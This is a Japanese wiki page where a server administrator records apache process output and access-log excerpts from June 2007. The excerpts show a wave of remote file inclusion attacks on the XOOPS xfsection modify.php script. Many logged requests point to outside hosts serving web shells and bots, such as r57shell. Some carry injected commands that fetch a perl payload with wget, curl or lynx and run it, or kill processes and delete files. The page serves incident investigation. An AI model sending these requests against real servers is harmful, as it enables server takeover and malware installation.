![[PukiWiki]](image/pukiwiki.png "[PukiWiki]")
apacheのpsのログをとっていると、以下のような活動が残っていた。 2007年 6月 25日 月曜日 16:32:19 JST 2007年 6月 25日 月曜日 16:32:29 JST apache 5201 6.7 0.2 3876 632 ? R 16:32 0:00 find / -type f -name service.pwd 2007年 6月 25日 月曜日 16:32:39 JST 2007年 6月 27日 水曜日 11:55:46 JST apache 14665 8.8 0.2 1620 552 ? R 11:55 0:00 find / -type f -name service.pwd
ログを調べると以下のようなものが出てきた。 [root@www httpd]# grep modify.php *-access_log | grep -v 404 | grep 27/Jun/2007:11 aimssinc.com-access_log:libwww-perl/5.805 195.91.143.151 - - [27/Jun/2007:11:08:40 +0900] "GET /modules/xfsection/article.php?articleid=162/modules/xfsection/modify.php?dir_module=http://www.newcomp.com.ua/administrator/components/com_remository/images/rshells? HTTP/1.1" 200 680 [root@www httpd]# grep modify.php *-access_log | grep -v 404 | grep 25/Jun/2007:16 sensho-ds.com-access_log:libwww-perl/5.803 front.zzr.com - - [25/Jun/2007:16:13:28 +0900] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/xpejuang/safe.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.805 alpha.hostfury.net - - [25/Jun/2007:16:20:22 +0900] "GET //modules/xfsection/modify.php?dir_module=http://crotz.tk/cmd.do? HTTP/1.1" 302 292 [root@www httpd]#
他にもたくさん
sensho-ds.com-access_log:libwww-perl/5.805 host.bnac.biz - - [29/Jun/2007:16:28:50 +0900] "GET /modules/xfsection/article.php?articleid=22/modify.php?dir_module=http://marc0zz.altervista.org/571? HTTP/1.1" 200 680 sensho-ds.com-access_log:libwww-perl/5.805 esc106.midphase.com - - [29/Jun/2007:17:58:09 +0900] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/xpejuang/safe.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.79 oscailt.org - - [29/Jun/2007:19:48:22 +0900] "GET //modules/xfsection/modify.php?dir_module=http://bacaplume.free.fr/manager/frontinc/services.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.65 ns1.caswellplating.com - - [29/Jun/2007:22:43:21 +0900] "GET /modules/xfsection/modify.php?dir_module=http://scan.ifastnet.com/echo.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.76 141.subnet222-124-158.astinet.telkom.net.id - - [29/Jun/2007:22:50:04 +0900] "GET //modify.php?dir_module=http://www.freewebs.com/vaksin13/code.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 200-102-138-161.paemt705.dsl.brasiltelecom.net.br - - [30/Jun/2007:00:50:13 +0900] "GET //modules/xfsection/modify.php?dir_module=http://br.geocities.com/gremista99/bot.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 200-102-138-161.paemt705.dsl.brasiltelecom.net.br - - [30/Jun/2007:01:11:45 +0900] "GET //modules/xfsection/modify.php?dir_module=http://br.geocities.com/gremista99/bot.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201.73.174.231 - - [30/Jun/2007:02:43:33 +0900] "GET //modules/xfsection/modify.php?dir_module=http://www.psaicomentsb.xpg.com.br/cmd.gif?&cmd=killall%20-9%20perl HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201.73.174.231 - - [30/Jun/2007:02:43:33 +0900] "GET //modules/xfsection/modify.php?dir_module=http://www.psaicomentsb.xpg.com.br/cmd.gif?&cmd=killall%20-9%20perl HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201.73.174.231 - - [30/Jun/2007:02:49:10 +0900] "GET //modules/xfsection/modify.php?dir_module=http://72.29.94.218/x.txt HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201.73.174.231 - - [30/Jun/2007:02:49:19 +0900] "GET //modules/xfsection/modify.php?dir_module=http://72.29.94.218/x.txt HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 20158187162.user.veloxzone.com.br - - [30/Jun/2007:03:28:52 +0900] "GET //modules/xfsection/modify.php?dir_module=http://teste21.t35.com/cmd/tool25.dat?&cmd=%20cd%20/tmp;wget%20http://www.boderox.kit.net/bdeunix1.txt;curl%20-o%20bdeunix.txt%20http://www.boderox.kit.net/bdeunix1.txt;fetch%20http://www.boderox.kit.net/bdeunix1.txt;lwp-download%20http://www.boderox.kit.net/bdeunix1.txt;GET%20http://www.boderox.kit.net/bdeunix1.txt;lynx%20-source%20http://www.boderox.kit.net/bdeunix1.txt;perl%20bdeunix1.txt HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 20158187162.user.veloxzone.com.br - - [30/Jun/2007:03:54:54 +0900] "GET //modules/xfsection/modify.php?dir_module=http://teste21.t35.com/cmd/tool25.dat?&cmd=%20cd%20/tmp;wget%20http://www.boderox.kit.net/bde.txt;curl%20-o%20bde.txt%20http://www.boderox.kit.net/bde.txtt;fetch%20http://www.boderox.kit.net/bde.txt;lwp-download%20http://www.boderox.kit.net/bde.txt;GET%20http://www.boderox.kit.net/bde.txt;lynx%20-source%20http://www.boderox.kit.net/bde.txt;perl%20bde.txt HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.69 smw-siegen.de - - [30/Jun/2007:04:57:26 +0900] "GET //modules/xfsection/modify.php?dir_module=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 202.146.180.94 - - [30/Jun/2007:05:23:01 +0900] "GET //modules/xfsection/modify.php?dir_module=http://geocities.com/bayucoga/dodolt.txt? HTTP/1.0" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 200-102-138-161.paemt705.dsl.brasiltelecom.net.br - - [30/Jun/2007:07:51:25 +0900] "GET //modules/xfsection/modify.php?dir_module=http://chrono.netfast.org/scmd.txt?&cmd=cd%20/tmp;rm%20-rf%20*.txt;GET%20http://br.geocities.com/gremista99/scan.txt%20>%20scan.txt;perl%20scan.txt;rm%20scan.txt HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201-13-63-110.dsl.telesp.net.br - - [30/Jun/2007:08:44:38 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.academiebellezza.com/oldab/icezinhu.dat? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201-13-63-110.dsl.telesp.net.br - - [30/Jun/2007:08:44:45 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.academiebellezza.com/oldab/icezinhu.dat? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201-13-63-110.dsl.telesp.net.br - - [30/Jun/2007:08:44:48 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.academiebellezza.com/oldab/icezinhu.dat? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201-13-63-110.dsl.telesp.net.br - - [30/Jun/2007:08:44:57 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.academiebellezza.com/oldab/icezinhu.dat? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201-13-63-110.dsl.telesp.net.br - - [30/Jun/2007:08:45:12 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.academiebellezza.com/oldab/icezinhu.dat? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201-13-63-110.dsl.telesp.net.br - - [30/Jun/2007:08:45:13 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.academiebellezza.com/oldab/icezinhu.dat? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201-13-63-110.dsl.telesp.net.br - - [30/Jun/2007:08:47:09 +0900] "GET //modules/xfsection/modify.php?dir_module=http://www.academiebellezza.com/oldab/icezinhu.dat? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 201.73.174.231 - - [30/Jun/2007:08:47:51 +0900] "GET //modules/xfsection/modify.php?dir_module=http://www.psaicomentsb.xpg.com.br/cmd.gif?&cmd=id HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 200-102-138-161.paemt705.dsl.brasiltelecom.net.br - - [30/Jun/2007:09:32:05 +0900] "GET //modules/xfsection/modify.php?dir_module=http://chrono.netfast.org/scmd.txt?&cmd=cd%20/tmp;rm%20-rf%20*.txt;GET%20http://br.geocities.com/gremista99/arco.txt%20>%20arco.txt;perl%20arco.txt;rm%20arco.txt HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 200-102-138-161.paemt705.dsl.brasiltelecom.net.br - - [30/Jun/2007:09:41:48 +0900] "GET //modules/xfsection/modify.php?dir_module=http://chrono.netfast.org/scmd.txt?&cmd=cd%20/tmp;rm%20-rf%20*.txt;GET%20http://br.geocities.com/gremista99/arco.txt%20>%20arco.txt;perl%20arco.txt;rm%20arco.txt HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 200-102-138-161.paemt705.dsl.brasiltelecom.net.br - - [30/Jun/2007:09:53:40 +0900] "GET //modules/xfsection/modify.php?dir_module=http://chrono.netfast.org/scmd.txt?&cmd=cd%20/tmp;rm%20-rf%20*.txt;GET%20http://www.shk-haustechnik.de/news/include/scann.txt%20>%20scann.txt;perl%20scann.txt;rm%20scann.txt HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 200-102-138-161.paemt705.dsl.brasiltelecom.net.br - - [30/Jun/2007:10:11:34 +0900] "GET //modules/xfsection/modify.php?dir_module=http://auction-mmorpg.com/phpAdsNew/bot.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.65 admin.oozoz.com - - [30/Jun/2007:11:19:19 +0900] "GET /modules/xfsection/modify.php?dir_module=http://scan.prohosts.org/echo.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.65 admin.oozoz.com - - [30/Jun/2007:11:19:20 +0900] "GET /modules/xfsection/modify.php?dir_module=http://scan.prohosts.org/echo.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 20158005169.user.veloxzone.com.br - - [30/Jun/2007:11:25:33 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.h9host.com/r57shell.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 20158005169.user.veloxzone.com.br - - [30/Jun/2007:11:25:34 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.h9host.com/r57shell.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 20158005169.user.veloxzone.com.br - - [30/Jun/2007:11:25:45 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.h9host.com/r57shell.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 20158005169.user.veloxzone.com.br - - [30/Jun/2007:11:25:59 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.h9host.com/r57shell.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 20158005169.user.veloxzone.com.br - - [30/Jun/2007:11:26:12 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.h9host.com/r57shell.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:Mozilla/3.0 (compatible; Indy Library) 20158005169.user.veloxzone.com.br - - [30/Jun/2007:11:26:16 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.h9host.com/r57shell.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.65 admin.oozoz.com - - [30/Jun/2007:11:50:26 +0900] "GET /modules/xfsection/modify.php?dir_module=http://scan.prohosts.org/echo.txt? HTTP/1.1" 302 292 sensho-ds.com-access_log:libwww-perl/5.65 admin.oozoz.com - - [30/Jun/2007:13:21:28 +0900] "GET /modules/xfsection/modify.php?dir_module=http://www.Leonard0.kit.net/echo.txt?? HTTP/1.1" 302 292
